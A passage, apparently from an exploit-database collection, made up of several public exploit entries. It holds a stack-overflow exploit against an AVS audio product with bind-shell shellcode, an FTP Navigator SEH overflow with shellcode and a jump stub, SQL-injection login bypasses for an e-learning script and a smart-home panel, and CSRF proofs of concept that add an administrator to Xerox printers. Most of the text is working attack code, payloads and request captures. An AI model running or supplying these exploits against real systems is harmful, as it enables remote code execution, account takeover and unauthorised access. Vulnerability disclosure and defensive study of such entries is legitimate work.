0x00f33000 | False | False | False | False | False | # - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown. offEdx = '\x41'*260 edx = '\x42\x42\x42\x42' # EDX overwrite at 260 bytes. EDX=0x42424242 # SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed. nSEH = '\x42'*4 SEH = '\x43'*4 # - If address at offset 308 is not readable, then the program will throw an exception at: # 75F9ECE7 3806 cmp byte ptr ds:[esi], al # [!] Access violation when reading [esi] # - If we can get past this exception, we can overwrite EIP at offset 304. # - [esi] must be successfully overwriten so we can put our payload after it. offEip = '\x45'*32 # - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled. # - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump # to it with a vanilla EIP overwrite; due to overwriting a return address on the stack. # - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite: # ECX=0018FA60 ESP=0018FA60 (Stack locations will vary) # 0018FA54 45454545 EEEE // [296] # 0018FA58 45454545 EEEE // [300] # 0018FA5C 1006563E V... // [304] eip var # Pointer to 'pop+ret' # *0018FA60 00000000 .... // [308] esi var # our esi address gets replaced by 4 nulls # 0018FA64 1006A438 8... // [312] jmpEsp var # Pointer to 'jmp esp' # 0018FA68 E510EC10 .... // [316] fixStack var # ASM to fix the Stack so shellcode will work # [AVSAudioEditor5.dll] (C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSAudioEditor5.dll) # Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | # 0x10000000 | 0x100a1000 | False | True | False | False | False | # 0x1006563e : pop esi # ret | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll] eip = '\x3e\x56\x06\x10' # pop+ret # - After pop+ret, ESP=0018FA68 esi = '\x10\x10\x08\x10' # [AVSAudioEditor5.dll] | .data | RW # 0x1006a438 : jmp esp | {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll] # - the esi var address is just a random, readable memory location that will not move; to bypass the exception. jmpEsp = '\x38\xa4\x06\x10' # jmp esp pointer # EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly. fixStack = '\x83\xEC\x10' # sub esp, 0x10 fixStack += '\x89\xE5' # mov ebp, esp fixStack += '\x83\xEC\x60' # sub esp, 0x60 #msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00' --format python # x86/shikata_ga_nai succeeded with size 355 (iteration=0) shellcode = b"" shellcode += b"\xbe\xd8\x49\x8d\x72\xd9\xe5\xd9\x74\x24\xf4" shellcode += b"\x5a\x31\xc9\xb1\x53\x31\x72\x12\x83\xea\xfc" shellcode += b"\x03\xaa\x47\x6f\x87\xb6\xb0\xed\x68\x46\x41" shellcode += b"\x92\xe1\xa3\x70\x92\x96\xa0\x23\x22\xdc\xe4" shellcode += b"\xcf\xc9\xb0\x1c\x5b\xbf\x1c\x13\xec\x0a\x7b" shellcode += b"\x1a\xed\x27\xbf\x3d\x6d\x3a\xec\x9d\x4c\xf5" shellcode += b"\xe1\xdc\x89\xe8\x08\x8c\x42\x66\xbe\x20\xe6" shellcode += b"\x32\x03\xcb\xb4\xd3\x03\x28\x0c\xd5\x22\xff" shellcode += b"\x06\x8c\xe4\xfe\xcb\xa4\xac\x18\x0f\x80\x67" shellcode += b"\x93\xfb\x7e\x76\x75\x32\x7e\xd5\xb8\xfa\x8d" shellcode += b"\x27\xfd\x3d\x6e\x52\xf7\x3d\x13\x65\xcc\x3c" shellcode += b"\xcf\xe0\xd6\xe7\x84\x53\x32\x19\x48\x05\xb1" shellcode += b"\x15\x25\x41\x9d\x39\xb8\x86\x96\x46\x31\x29" shellcode += b"\x78\xcf\x01\x0e\x5c\x8b\xd2\x2f\xc5\x71\xb4" shellcode += b"\x50\x15\xda\x69\xf5\x5e\xf7\x7e\x84\x3d\x90" shellcode += b"\xb3\xa5\xbd\x60\xdc\xbe\xce\x52\x43\x15\x58" shellcode += b"\xdf\x0c\xb3\x9f\x20\x27\x03\x0f\xdf\xc8\x74" shellcode += b"\x06\x24\x9c\x24\x30\x8d\x9d\xae\xc0\x32\x48" shellcode += b"\x5a\xc8\x95\x23\x79\x35\x65\x94\x3d\x95\x0e" shellcode += b"\xfe\xb1\xca\x2f\x01\x18\x63\xc7\xfc\xa3\xac" shellcode += b"\x17\x88\x42\xd8\x37\xdc\xdd\x74\xfa\x3b\xd6" shellcode += b"\xe3\x05\x6e\x4e\x83\x4e\x78\x49\xac\x4e\xae" shellcode += b"\xfd\x3a\xc5\xbd\x39\x5b\xda\xeb\x69\x0c\x4d" shellcode += b"\x61\xf8\x7f\xef\x76\xd1\x17\x8c\xe5\xbe\xe7" shellcode += b"\xdb\x15\x69\xb0\x8c\xe8\x60\x54\x21\x52\xdb" shellcode += b"\x4a\xb8\x02\x24\xce\x67\xf7\xab\xcf\xea\x43" shellcode += b"\x88\xdf\x32\x4b\x94\x8b\xea\x1a\x42\x65\x4d" shellcode += b"\xf5\x24\xdf\x07\xaa\xee\xb7\xde\x80\x30\xc1" shellcode += b"\xde\xcc\xc6\x2d\x6e\xb9\x9e\x52\x5f\x2d\x17" shellcode += b"\x2b\xbd\xcd\xd8\xe6\x05\xfd\x92\xaa\x2c\x96" shellcode += b"\x7a\x3f\x6d\xfb\x7c\xea\xb2\x02\xff\x1e\x4b" shellcode += b"\xf1\x1f\x6b\x4e\xbd\xa7\x80\x22\xae\x4d\xa6" shellcode += b"\x91\xcf\x47" payload = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode # offsets: 0 260 264 268 272 304 308 312 316 324 f = open(File, 'w') # open file for write f.write(payload) f.close() # close the file print blt + File + " created successfully " # root@kali# nc <Victim IP> 9999 # Microsoft Windows [Version 6.1.7601] # C:\Program Files (x86)\AVS4YOU\AVSAudioConverter> except: print err + File + ' failed to create'

# Exploit Title: elearning-script 1.0 - Authentication Bypass # Author: riamloo # Date: 2019-12-29 # Vendor Homepage: https://github.com/amitkolloldey/elearning-script # Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip # Version: 1 # CVE: N/A # Tested on: Win 10 # Discription: # E Learning Blog Developed In Raw PHP # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : /login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/elearning-script-master/login.php POST /elearning-script-master/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; Content-Length: 445 Referer: http://localhost/elearning-script-master/login.php Cookie: PHPSESSID=a81sp8jg62nzxs8icvbf44ep3iu Connection: close Upgrade-Insecure-Requests: 1 '=''or'

# Exploit Title: FTP Navigator 8.03 - Stack Overflow (SEH) # Date: December 28th, 2019 # Exploit Author: boku # Discovered by: Chris Inzinga # Original DoS: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH) # Original DoS Link: https://www.exploit-db.com/exploits/47794 # Software Vendor: http://www.internet-soft.com/ # Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1 # Version: Version 8.03 # Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64) # Recreate: #!/usr/bin/python # 1) Generate 'poc.txt' payload using python 2.7.x # 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy # 3) Install & Open FTP Navigator v8.03 # 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command # - A textbox will appear on the bottom of the right window # 5) Paste payload from generated txt file into textbox # 6) Click "Do it" # - The program will crash & calculator will open blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet try: nops = '\x90'*400 # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper #x86/alpha_upper succeeded with size 447 (iteration=0) shellcode = b"" shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49" shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50" shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39" shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b" shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c" shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a" shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33" shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31" shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b" shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50" shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32" shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31" shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48" shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a" shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e" shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43" shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b" shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c" shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36" shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35" shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b" shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56" shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a" shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50" shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d" shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33" shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31" shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f" shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38" shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59" shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50" shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51" shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50" shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42" shellcode += b"\x4c\x32\x43\x53\x30\x41\x41" jmp2nops = '\xe8\xff\xff\xff\xff' # call +4 // This call will land us at the last \xff of our call instruction jmp2nops += '\xc3' # ret/inc ebx // Since EIP is at \xff after call, this will be interpruted as: \xff\xc3 =inc ebx (a nop instruction) jmp2nops += '\x59' # pop ecx // Pop the memory location from the call instruction that was pushed onto the stack into the ECX register jmp2nops += '\x31\xd2' # xor edx, edx // Clear the EDX register. We are going to jump to the beginning of our buffer. jmp2nops += '\x66\x81\xca\xfc\x0f' # or dx, 4092 // EDX is now equal to 0x00000ffc jmp2nops += '\x66\x29\xd1' # sub ex, dx // We subtract 4092 bytes from our memory location in the ECX register. jmp2nops += '\xff\xe1' # jmp ecx // Now we jump back to the beginning of our buffer; into our NOP sled. offset = '\x41' * (4112-len(nops+shellcode+jmp2nops)) nSEH = '\xeb\xeb\x90\x90' # jmp short -22 (to jmp2nops) # 0x00457576 [ftpnavi.exe] : pop edx # pop ebx # ret # | Rebase: False | ASLR: False | SafeSEH: False # | (c:\FTP Navigator\ftpnavi.exe) | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} SEH = '\x76\x75\x45' # SEH 3 byte overwrite payload = nops+shellcode+offset+jmp2nops+nSEH+SEH File = 'poc.txt' f = open(File, 'w') # open file for write f.write(payload) f.close() # close the file print blt + File + " created successfully " except: print err + File + ' failed to create'

# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin) # Date: 2018-12-19 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.xerox.com/ # Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655 # Software : Xerox Printer # Product Version: WorkCentre® 6655 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # The CSRF vulnerability was discovered in the WorkCentre® 6655 printer model of Xerox printer hardware. # A request to add users is made in the Device User Database form field. This request is captured by # the proxy. And a CSRF PoC HTML file is prepared. Xerox WorkCentre® 6655 printers allow CSRF. A request # to add users is made in the Device User Database form field to the xerox.set URI. # (The frmUserName value must have a unique name.) HTTP POST Request : POST /dummypost/xerox.set HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 494 Origin: https://server Connection: close Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; [email protected]; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue Upgrade-Insecure-Requests: 1 CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1 HTTP Response : HTTP/1.1 200 OK Date: Wed, 18 Dec 2019 22:09:40 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 13518 CSRF HTML PoC : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://server/dummypost/xerox.set" method="POST"> <input type="hidden" name="CSRFToken" value="72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776" /> <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;ccgen&#95;fac&#95;dispatch&#95;fn" /> <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;x&#61;&sort&#61;Fname&order&#61;Up" /> <input type="hidden" name="CcgenModule" value="UserEdit" /> <input type="hidden" name="isRoles" value="True" /> <input type="hidden" name="isPassword" value="True" /> <input type="hidden" name="isCreate" value="True" /> <input type="hidden" name="rolesStr" value="2&#44;5&#44;1&#44;" /> <input type="hidden" name="limited" value="False" /> <input type="hidden" name="oid" value="0" /> <input type="hidden" name="userName" value="ismailtasdelen" /> <input type="hidden" name="friendlyName" value="Ismail&#32;Tasdelen" /> <input type="hidden" name="newPassword" value="Test1234" /> <input type="hidden" name="retypePassword" value="Test1234" /> <input type="hidden" name="role" value="2" /> <input type="hidden" name="role" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit: Thrive Smart Home 1.1 - Authentication Bypass # Date: 2019-12-30 # Author: LiquidWorm # Vendor: Thrive # Product web page: http://www.thrivesmarthomes.com # Affected version: 1.1 # Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips # Advisory ID: ZSL-2019-5554 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php Thrive Smart Home v1.1 SQL Injection Authentication Bypass Vendor: Thrive Product web page: http://www.thrivesmarthomes.com Affected version: 1.1 Summary: As smart home technology becomes more affordable and easy to install with services offered by Thrive Smart Homes, there are some great options available to give your home a high-tech makeover. If the convenience of feeding your cat or turning on your air conditioning with a tap on your smartphone isn't enough of a reason to make the investment, consider how conveniently you can protect your home and belongings. From Wi-Fi-equipped smoke detectors to plugs with auto turn-offs, smart homes with their always-on connectivity and notifications systems allow consumers to quickly respond to the unexpected. For instance, if you install a smart water leak and moisture monitoring device, you can set up alerts on your phone for unusual changes in moisture and stop leaks before they cause major flooding or mold. It's a convenient way to proactively protect your home from costly damage, whether it's an overflowing laundry tub, a cracked washer hose, or a leaky water heater. Desc: The application suffers from an SQL Injection vulnerability. Input passed through 'user' POST parameter in checklogin.php is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. Tested on: Apache httpd 2.4.25 (Raspbian) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5554 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php 21.10.2019 -- $ curl http://192.168.1.1:8080/raspberry/include/checklogin.php -X POST -d"submit=LOGIN&user=' or 1=1#&pass=pass" -i HTTP/1.1 302 Found Date: Mon, 21 Oct 2019 23:35:18 GMT Server: Apache/2.4.25 (Raspbian) Set-Cookie: PHPSESSID=6cu3frj0qes9c96v5de5vp37e2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: ../home.php Content-Length: 1 Content-Type: text/html; charset=UTF-8

# Exploit Title: XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin) # Date: 2018-12-19 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.xerox.com/ # Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series/ # Software : Xerox Printer # Product Version: WorkCentre® 7855 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # The CSRF vulnerability was discovered in the WorkCentre® 7855 printer model of Xerox printer hardware. # A request to add users is made in the Device User Database form field. This request is captured by # the proxy. And a CSRF PoC HTML file is prepared. WorkCentre® 7855 printers allow CSRF. A request # to add users is made in the Device User Database form field to the xerox.set URI. # (The frmUserName value must have a unique name.) HTTP POST Request : POST /dummypost/xerox.set HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 494 Origin: http://server Connection: close Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=04dc6361e94c451ff4d7d1d3ef8e32cd; WebTimerPopupID=12; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000001000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue Upgrade-Insecure-Requests: 1 CSRFToken=67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1 HTTP Response : HTTP/1.1 200 OK Date: Thu, 19 Dec 2019 05:13:19 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 11947 CSRF HTML PoC : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://server/dummypost/xerox.set" method="POST"> <input type="hidden" name="CSRFToken" value="67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b" /> <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;ccgen&#95;fac&#95;dispatch&#95;fn" /> <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;x&#61;&sort&#61;Fname&order&#61;Up" /> <input type="hidden" name="CcgenModule" value="UserEdit" /> <input type="hidden" name="isRoles" value="True" /> <input type="hidden" name="isPassword" value="True" /> <input type="hidden" name="isCreate" value="True" /> <input type="hidden" name="rolesStr" value="2&#44;5&#44;1&#44;" /> <input type="hidden" name="limited" value="False" /> <input type="hidden" name="oid" value="0" /> <input type="hidden" name="userName" value="ismailtasdelen" /> <input type="hidden" name="friendlyName" value="Ismail&#32;Tasdelen" /> <input type="hidden" name="newPassword" value="Test1234" /> <input type="hidden" name="retypePassword" value="Test1234" /> <input type="hidden" name="role" value="2" /> <input type="hidden" name="role" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin) # Date: 2018-12-19 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.xerox.com/ # Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series # Software : Xerox Printer # Product Version: WorkCentre® 7830 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # The CSRF vulnerability was discovered in the WorkCentre® 7830 printer model of Xerox printer hardware. # A request to add users is made in the Device User Database form field. This request is captured by # the proxy. And a CSRF PoC HTML file is prepared. WorkCentre® 7830 printers allow CSRF. A request # to add users is made in the Device User Database form field to the xerox.set URI. # (The frmUserName value must have a unique name.) HTTP POST Request : POST /dummypost/xerox.set HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 494 Origin: http://server Connection: close Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=6524448254c9d6d6de52fe4a1085b994; WebTimerPopupID=5; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue Upgrade-Insecure-Requests: 1 CSRFToken=078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1 HTTP Response : HTTP/1.1 200 OK Date: Thu, 19 Dec 2019 05:34:36 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 15022 CSRF HTML PoC : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://server/dummypost/xerox.set" method="POST"> <input type="hidden" name="CSRFToken" value="078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708" /> <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;ccgen&#95;fac&#95;dispatch&#95;fn" /> <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;x&#61;&sort&#61;Fname&order&#61;Up" /> <input type="hidden" name="CcgenModule" value="UserEdit" /> <input type="hidden" name="isRoles" value="True" /> <input type="hidden" name="isPassword" value="True" /> <input type="hidden" name="isCreate" value="True" /> <input type="hidden" name="rolesStr" value="2&#44;5&#44;1&#44;" /> <input type="hidden" name="limited" value="False" /> <input type="hidden" name="oid" value="0" /> <input type="hidden" name="userName" value="ismailtasdelen" /> <input type="hidden" name="friendlyName" value="Ismail&#32;Tasdelen" /> <input type="hidden" name="newPassword" value="Test1234" /> <input type="hidden" name="retypePassword" value="Test1234" /> <input type="hidden" name="role" value="2" /> <input type="hidden" name="role" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>